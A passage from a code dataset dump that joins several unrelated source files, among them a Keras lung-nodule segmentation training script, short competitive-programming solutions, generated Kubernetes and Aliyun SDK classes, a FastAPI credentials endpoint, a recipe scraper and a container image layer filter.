masks = data_from_grid_by_proximity(masks1, upgrid_multi, upgrid_multi, grid=grid)
igrid += 1
return masks, scans
if __name__ == '__main__':
# Key initial parameters
dim = 8
start_from_scratch = False
load_initial_weights = False
if start_from_scratch and load_initial_weights:
model_weights_name_to_start_from = "../luna/models/d8_2x2x2_best_weights.h5" # only used when start_from_scratch is True and load_initial_weights is True
### KEY running parameteres
nb_epoch = 2
model_load_name = '../luna/models/d8g_bre_model_10.h5'
    model_save_name = '../luna/models/d8g_bre_model_12.h5'   ### MUST include "_model" string as we use this for a substitution for weights file
seed = 10000 # should be varied by steps/stages
set_lr_value = False
new_lr_value = 1e-5 # only used when set_lr_value is True
use_large_validation = True
grids = [10, 20]
upgrid_multis = [2, 8] # we modify only the last one if/as needed
batch_size = 28 # calculated for a 12GB graphics card (such as Tesla K80/AWS P2 system)
masks_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_0_3_4003", # note no npz extension here
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_4_8_4968",
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_0_3_64769",
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_4_8_91485"
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_0_3_1211",
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_4_8_1265",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_0_3_64769",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_4_8_91485"
],
[
#"../luna/model_data/masks_d16g1x40ba8_2x1x1_nodules_0_3_6897"
]]
masks_val_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_9_9_864" # note no npz extension here
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_9_9_255"
],
[
# "../luna/model_data/masks_d16g1x40ba8_2x1x1_blanks_8_9_35056"
]]
masks_val_large_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_9_9_864", # note no npz extension here
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_9_9_18642"
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_9_9_255",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_9_9_18642"
],
[
#, "../luna/model_data/masks_d16g1x40ba8_2x1x1_blanks_8_9_35056"
]]
np.random.seed(seed)
masks, scans = load_aggregate_masks_scans (masks_mnames, grids, upgrid_multis)
print ("Masks and Scans shapes: ", masks.shape, scans.shape)
masks[masks < 0] = 0 # just in case (eliminate the blanks's marking)
if masks.shape[2] > 1:
masks = masks[:,:,masks.shape[2] // 2] ## select the central value as this one contains still all data
masks = masks[:, np.newaxis]
print ("Masks shape after 2D mapping: ", masks.shape)
#np.random.seed(121) # you may wish to keep this seed constant for validation purposes
masks_val, scans_val = load_aggregate_masks_scans (masks_val_mnames, grids, upgrid_multis)
print ("Val Masks and Scans shapes: ", masks_val.shape, scans_val.shape)
masks_val[masks_val < 0] = 0
if masks_val.shape[2] > 1:
masks_val = masks_val[:,:,masks_val.shape[2] // 2] ## select the central value as this one contains still all data
masks_val = masks_val[:, np.newaxis]
print ("Masks_val shape after 2D mapping: ", masks_val.shape)
masks_val_large, scans_val_large = load_aggregate_masks_scans (masks_val_large_mnames, grids, upgrid_multis)
print ("Large Val Masks and Scans shapes: ", masks_val_large.shape, scans_val_large.shape)
masks_val_large[masks_val_large < 0] = 0
if masks_val_large.shape[2] > 1:
masks_val_large = masks_val_large[:,:,masks_val_large.shape[2] // 2] ## select the central value as this one contains still all data
masks_val_large = masks_val_large[:, np.newaxis]
print ("Large Val Masks shape after 2D mapping: ", masks_val_large.shape)
if start_from_scratch:
model = unet_model_xd3_2_6l_grid(nb_filter=20, dim=dim, clen=3, img_rows=None , img_cols=None )
print(model.summary())
if load_initial_weights:
model_weights_name = model_weights_name_to_start_from ### could potentially load best weights
model.load_weights(model_weights_name)
print("Weights and output models: ", model_weights_name, model_save_name)
else:
print("Start from scratch (no weights),output models: ", model_save_name)
else:
## load_previous_model
print ("Loading model: ", model_load_name)
model = load_model(model_load_name, #3
custom_objects={'dice_coef_loss': dice_coef_loss,
'dice_coef': dice_coef
}
)
#print(model.summary())
print("Load and output models: ", model_load_name, model_save_name)
## set the data ...
masks = masks.astype(np.int16)
final_couple_of_iterations = False
if final_couple_of_iterations:
masks = np.concatenate((masks, masks_val))
scans = np.concatenate((scans, scans_val))
data_gen_args = dict(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0,
width_shift_range=0.5,
height_shift_range=0.5,
horizontal_flip=True,
vertical_flip=False,
fill_mode= "wrap",
zoom_range=0
)
image_datagen = ImageDataGenerator(**data_gen_args)
mask_datagen = ImageDataGenerator(**data_gen_args)
# Provide the same seed and keyword arguments to the fit and flow methods
shuffle = True # default
image_datagen.fit(scans, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
image_generator = image_datagen.flow(scans,
batch_size = batch_size,
#shuffle = shuffle,
seed=seed)
mask_generator = mask_datagen.flow(masks,
batch_size = batch_size,
#shuffle = shuffle,
seed=seed)
# combine generators into one which yields image and masks
train_generator = zip(image_generator, mask_generator)
if set_lr_value:
print("Model learning rate (old): ", model.optimizer.lr.get_value()) # was 1e-4
model.optimizer.lr.set_value(new_lr_value)
print("Model learning rate(new): ", model.optimizer.lr.get_value())
samples_per_epoch = masks.shape[0]
model.fit_generator(
train_generator,
samples_per_epoch= samples_per_epoch,
nb_epoch = nb_epoch,
validation_data = ( scans_val, masks_val),
verbose=1)
model.save(model_save_name)
model.save_weights(model_save_name.replace("_model", "_weights", 1))
masks_pred = model.predict(scans_val, verbose=1)
dice_check = dice_coef_np(masks_val, masks_pred)
print ("dice_check: ", dice_check)
if use_large_validation:
masks_pred_large = model.predict(scans_val_large, batch_size =1, verbose=1)
dice_check = dice_coef_np(masks_val_large, masks_pred_large)
print ("Full dice_check: ", dice_check)
print("Model learning rate: ", model.optimizer.lr.get_value())
| 41.933014
| 421
| 0.63293
|
129b7622967975dfed73c61a77036c9955cecc2d
| 274
|
py
|
Python
|
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
while True:
try:
n, m = input().split(" ")
soma = 0
for i in m:
soma += int(i)
print(soma, end=' ')
if soma % 3 == 0:
print("sim")
else:
print("nao")
except EOFError:
break
| 18.266667
| 33
| 0.375912
|
88a49ed30e9f4ada5aa1b14a326e15faeae9e98c
| 12,576
|
py
|
Python
|
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1StatefulSetStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'collision_count': 'int',
'conditions': 'list[V1StatefulSetCondition]',
'current_replicas': 'int',
'current_revision': 'str',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int',
'update_revision': 'str',
'updated_replicas': 'int'
}
attribute_map = {
'collision_count': 'collisionCount',
'conditions': 'conditions',
'current_replicas': 'currentReplicas',
'current_revision': 'currentRevision',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas',
'update_revision': 'updateRevision',
'updated_replicas': 'updatedReplicas'
}
def __init__(self, collision_count=None, conditions=None, current_replicas=None, current_revision=None, observed_generation=None, ready_replicas=None, replicas=None, update_revision=None, updated_replicas=None): # noqa: E501
"""V1StatefulSetStatus - a model defined in OpenAPI""" # noqa: E501
self._collision_count = None
self._conditions = None
self._current_replicas = None
self._current_revision = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self._update_revision = None
self._updated_replicas = None
self.discriminator = None
if collision_count is not None:
self.collision_count = collision_count
if conditions is not None:
self.conditions = conditions
if current_replicas is not None:
self.current_replicas = current_replicas
if current_revision is not None:
self.current_revision = current_revision
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
if update_revision is not None:
self.update_revision = update_revision
if updated_replicas is not None:
self.updated_replicas = updated_replicas
@property
def collision_count(self):
"""Gets the collision_count of this V1StatefulSetStatus. # noqa: E501
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision. # noqa: E501
:return: The collision_count of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._collision_count
@collision_count.setter
def collision_count(self, collision_count):
"""Sets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision. # noqa: E501
:param collision_count: The collision_count of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._collision_count = collision_count
@property
def conditions(self):
"""Gets the conditions of this V1StatefulSetStatus. # noqa: E501
Represents the latest available observations of a statefulset's current state. # noqa: E501
:return: The conditions of this V1StatefulSetStatus. # noqa: E501
:rtype: list[V1StatefulSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state. # noqa: E501
:param conditions: The conditions of this V1StatefulSetStatus. # noqa: E501
:type: list[V1StatefulSetCondition]
"""
self._conditions = conditions
@property
def current_replicas(self):
"""Gets the current_replicas of this V1StatefulSetStatus. # noqa: E501
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision. # noqa: E501
:return: The current_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._current_replicas
@current_replicas.setter
def current_replicas(self, current_replicas):
"""Sets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision. # noqa: E501
:param current_replicas: The current_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._current_replicas = current_replicas
@property
def current_revision(self):
"""Gets the current_revision of this V1StatefulSetStatus. # noqa: E501
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas). # noqa: E501
:return: The current_revision of this V1StatefulSetStatus. # noqa: E501
:rtype: str
"""
return self._current_revision
@current_revision.setter
def current_revision(self, current_revision):
"""Sets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas). # noqa: E501
:param current_revision: The current_revision of this V1StatefulSetStatus. # noqa: E501
:type: str
"""
self._current_revision = current_revision
@property
def observed_generation(self):
"""Gets the observed_generation of this V1StatefulSetStatus. # noqa: E501
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server. # noqa: E501
:return: The observed_generation of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server. # noqa: E501
:param observed_generation: The observed_generation of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""Gets the ready_replicas of this V1StatefulSetStatus. # noqa: E501
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition. # noqa: E501
:return: The ready_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""Sets the ready_replicas of this V1StatefulSetStatus.
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition. # noqa: E501
:param ready_replicas: The ready_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""Gets the replicas of this V1StatefulSetStatus. # noqa: E501
replicas is the number of Pods created by the StatefulSet controller. # noqa: E501
:return: The replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""Sets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller. # noqa: E501
:param replicas: The replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
if replicas is None:
raise ValueError("Invalid value for `replicas`, must not be `None`") # noqa: E501
self._replicas = replicas
@property
def update_revision(self):
"""Gets the update_revision of this V1StatefulSetStatus. # noqa: E501
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas) # noqa: E501
:return: The update_revision of this V1StatefulSetStatus. # noqa: E501
:rtype: str
"""
return self._update_revision
@update_revision.setter
def update_revision(self, update_revision):
"""Sets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas) # noqa: E501
:param update_revision: The update_revision of this V1StatefulSetStatus. # noqa: E501
:type: str
"""
self._update_revision = update_revision
@property
def updated_replicas(self):
"""Gets the updated_replicas of this V1StatefulSetStatus. # noqa: E501
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision. # noqa: E501
:return: The updated_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._updated_replicas
@updated_replicas.setter
def updated_replicas(self, updated_replicas):
"""Sets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision. # noqa: E501
:param updated_replicas: The updated_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._updated_replicas = updated_replicas
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1StatefulSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 36.988235
| 235
| 0.664202
|
6893957cd3831d9a67709f381b84cc421eeb15d4
| 86
|
py
|
Python
|
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | 3
|
2019-08-16T16:55:48.000Z
|
2021-04-11T10:21:40.000Z
|
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
l=sorted(map(int,input().split()))
a=2*l[2]-l[1]-l[0]
print((a+3)//2 if a%2 else a//2)
| 28.666667
| 34
| 0.569767
|
78a28749c9d67da44143fc999db6da4ee140d967
| 1,914
|
py
|
Python
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class PushObjectCacheRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2014-11-11', 'PushObjectCache')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Area(self):
return self.get_query_params().get('Area')
def set_Area(self,Area):
self.add_query_param('Area',Area)
def get_ObjectPath(self):
return self.get_query_params().get('ObjectPath')
def set_ObjectPath(self,ObjectPath):
self.add_query_param('ObjectPath',ObjectPath)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
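# Illustrative usage with the core SDK client (credentials, region and URL below
# are placeholders, not values taken from this repository):
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
#   request = PushObjectCacheRequest()
#   request.set_ObjectPath('http://example.com/dir/file.txt')
#   response = client.do_action_with_exception(request)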
| 34.178571
| 74
| 0.761233
|
ac37b0baf014e515f4baa39f82035855da566d6a
| 1,732
|
py
|
Python
|
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | null | null | null |
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | 32
|
2021-10-06T20:06:16.000Z
|
2021-12-27T13:22:19.000Z
|
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | null | null | null |
import logging
import sys
import ariadne.asgi
import boto3
import fastapi
from botocore.exceptions import ClientError
from .context import QuiltContext
from .graphql import schema as graphql_schema
logger = logging.getLogger(__name__)
sts_client = boto3.client("sts")
session_cred = boto3._get_default_session().get_credentials()
if session_cred is None:
print("AWS credentials required. See boto3 docs for details:")
print("https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html#configuring-credentials")
sys.exit(1)
api = fastapi.FastAPI()
@api.middleware("http")
async def add_quilt_context(request: fastapi.Request, call_next):
with QuiltContext():
return await call_next(request)
@api.get("/api/auth/get_credentials")
def get_credentials():
"""
Obtain credentials corresponding to your role.
Returns a JSON object with the following keys:
AccessKeyId(string): access key ID
SecretAccessKey(string): secret key
SessionToken(string): session token
Expiration(ISO date string)
"""
try:
if session_cred.token:
return {
"AccessKeyId": session_cred.access_key,
"SecretAccessKey": session_cred.secret_key,
"SessionToken": session_cred.token,
"Expiration": getattr(session_cred, "expiry_time", None),
}
return sts_client.get_session_token()["Credentials"]
except ClientError:
logger.exception("Failed to get credentials for your AWS Account")
raise fastapi.HTTPException(500, "Failed to get credentials for your AWS Account.")
api.mount("/graphql", ariadne.asgi.GraphQL(graphql_schema), "GraphQL")
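# Illustrative request against a locally served instance (host and port are
# placeholders, they are not fixed by this module):
#   curl http://127.0.0.1:3000/api/auth/get_credentials
#   -> {"AccessKeyId": "...", "SecretAccessKey": "...", "SessionToken": "...", "Expiration": "..."}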
| 30.385965
| 115
| 0.704388
|
307a63d23cff1b18e2d90a35a92c8459525e02d9
| 637
|
py
|
Python
|
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
"MIT"
] | null | null | null |
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
"MIT"
] | null | null | null |
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
"MIT"
] | null | null | null |
'''
run_bbtrim.py
Use bbduk to trim adapters and poly(A) from Quant-Seq reads as recommended by Lexogen.
'''
import os
from snakemake.shell import shell
extra = snakemake.params.get('extra', '')
log = snakemake.log_fmt_shell(stdout=True, stderr=True)
sample = [snakemake.input] if isinstance(snakemake.input, str) else snakemake.input
n = len(sample)
assert n == 1 or n == 2, 'input->sample must have 1 (single-end) or 2 (paired-end) elements.'
outprefix = os.path.dirname(snakemake.output[0]) + '/'
shell(
'bbduk.sh '
'in={snakemake.input} '
'out={snakemake.output.fastq} '
    '{extra} '
'{log}')
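# Illustrative Snakemake rule invoking this wrapper through the `script:` directive
# (file names and the bbduk options shown are placeholders, not taken from this repo):
#   rule bbtrim:
#       input: "raw/{sample}.fastq.gz"
#       output: fastq="trimmed/{sample}.fastq.gz"
#       log: "logs/bbtrim/{sample}.log"
#       params: extra="ref=polyA.fa.gz,truseq.fa.gz k=13 ktrim=r useshortkmers=t mink=5 qtrim=r trimq=10 minlength=20"
#       script: "run_bbtrim.py"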
| 26.541667
| 93
| 0.692308
|
e536912bc7085cab167479d11cf3aaea5c4071ac
| 1,741
|
py
|
Python
|
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
from ._schema import DefaultSchema
from ._utils import get_minutes, normalize_string
class JustBento(DefaultSchema):
@classmethod
def host(cls):
return "justbento.com"
def title(self):
expected_prefix = "Recipe: "
title = self.soup.find("meta", {"property": "og:title", "content": True})
return title.get("content").replace(expected_prefix, "")
def total_time(self):
time = self.soup.find(
"div", {"class": "field-name-taxonomy-vocabulary-2"}
).find("a", {"typeof": "skos:Concept"})
return get_minutes(time)
def yields(self):
return "1"
def ingredients(self):
ingredients = (
self.soup.find("div", {"class": "field-name-body"}).find("ul").findAll("li")
)
return [normalize_string(ingredient.get_text()) for ingredient in ingredients]
def instructions(self):
elements_after_title = (
self.soup.find("div", {"class": "field-name-body"})
.find("h3")
.find_next_sibling("ul")
.find_next_siblings()
)
instructions = []
for element in elements_after_title:
if instructions and element.name != "p":
break
if element.name == "p":
instructions.append(element.get_text())
instructions = [
normalize_string(instruction) for instruction in instructions
]
return "\n".join(instructions) if instructions else None
def image(self):
image = self.soup.find("div", {"class": "field-name-body"}).find(
"img", {"class": "centerimg", "src": True}
)
return image["src"] if image else None
| 31.654545
| 88
| 0.572085
|
371d8cd2e29beb9f7a218bd487e4de4f17a9a695
| 215
|
py
|
Python
|
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
from turtle import *
hideturtle()
color("blue")
speed(-1)
length = 110
setheading(-140)
while length > 0:
for j in range(4):
forward(length)
right(90)
right(10)
length -= 2
mainloop()
| 12.647059
| 23
| 0.6
|
8f7b2de9491044e1a7c776f548957763158b2774
| 6,405
|
py
|
Python
|
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed
# under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import json
import tarfile
import tempfile
import container.registry
import util
def filter_image(
source_ref:str,
target_ref:str,
remove_files:[str]=[],
):
with tempfile.NamedTemporaryFile() as in_fh:
container.registry.retrieve_container_image(image_reference=source_ref, outfileobj=in_fh)
# XXX enable filter_image_file / filter_container_image to work w/o named files
with tempfile.NamedTemporaryFile() as out_fh:
filter_container_image(
image_file=in_fh.name,
out_file=out_fh.name,
remove_entries=remove_files
)
container.registry.publish_container_image(
image_reference=target_ref,
image_file_obj=out_fh,
)
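# Illustrative call (image references and file paths are placeholders):
#   filter_image(
#       source_ref='registry.example.org/project/image:1.0.0',
#       target_ref='registry.example.org/project/image:1.0.0-filtered',
#       remove_files=['etc/ssl/private/server.key'],
#   )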
def filter_container_image(
image_file,
out_file,
remove_entries,
):
util.existing_file(image_file)
if not remove_entries:
raise ValueError('remove_entries must not be empty')
with tarfile.open(image_file) as tf:
manifest = json.load(tf.extractfile('manifest.json'))
if not len(manifest) == 1:
raise NotImplementedError()
manifest = manifest[0]
cfg_name = manifest['Config']
with tarfile.open(image_file, 'r') as in_tf, tarfile.open(out_file, 'w') as out_tf:
_filter_files(
manifest=manifest,
cfg_name=cfg_name,
in_tarfile=in_tf,
out_tarfile=out_tf,
remove_entries=set(remove_entries),
)
def _filter_files(
manifest,
cfg_name,
in_tarfile: tarfile.TarFile,
out_tarfile: tarfile.TarFile,
remove_entries,
):
layer_paths = set(manifest['Layers'])
changed_layer_hashes = [] # [(old, new),]
# copy everything that does not need to be patched
for tar_info in in_tarfile:
if not tar_info.isfile():
out_tarfile.addfile(tar_info)
continue
# cfg needs to be rewritten - so do not cp
if tar_info.name in (cfg_name, 'manifest.json'):
continue
fileobj = in_tarfile.extractfile(tar_info)
if tar_info.name not in layer_paths:
out_tarfile.addfile(tar_info, fileobj=fileobj)
continue
# assumption: layers are always tarfiles
# check if we need to patch
layer_tar = tarfile.open(fileobj=fileobj)
have_match = bool(set(layer_tar.getnames()) & remove_entries)
fileobj.seek(0)
if not have_match:
out_tarfile.addfile(tar_info, fileobj=fileobj)
else:
old_hash = hashlib.sha256() # XXX hard-code hash algorithm for now
while fileobj.peek():
old_hash.update(fileobj.read(2048))
fileobj.seek(0)
patched_tar, size = _filter_single_tar(
in_file=layer_tar,
remove_entries=remove_entries,
)
# patch tar_info to reduced size
tar_info.size = size
new_hash = hashlib.sha256() # XXX hard-code hash algorithm for now
while patched_tar.peek():
new_hash.update(patched_tar.read(2048))
patched_tar.seek(0)
out_tarfile.addfile(tar_info, fileobj=patched_tar)
print('patched: ' + str(tar_info.name))
changed_layer_hashes.append((old_hash.hexdigest(), new_hash.hexdigest()))
# update cfg
cfg = json.load(in_tarfile.extractfile(cfg_name))
root_fs = cfg['rootfs']
if not root_fs['type'] == 'layers':
raise NotImplementedError()
# XXX hard-code hash algorithm (assume all entries are prefixed w/ sha256)
diff_ids = root_fs['diff_ids']
for old_hash, new_hash in changed_layer_hashes:
idx = diff_ids.index('sha256:' + old_hash)
diff_ids[idx] = 'sha256:' + new_hash
# hash cfg again (as its name is derived from its hash)
